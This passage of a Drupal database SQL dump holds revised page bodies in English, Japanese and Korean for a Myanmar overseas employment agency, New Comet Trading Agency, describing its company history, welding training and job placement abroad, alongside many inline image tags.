data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 299, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_3.jpg\" data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\" data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\" data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 299, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 300, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\" data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\" data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\" data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 300, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_3.jpg\" data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\" data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\" data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" 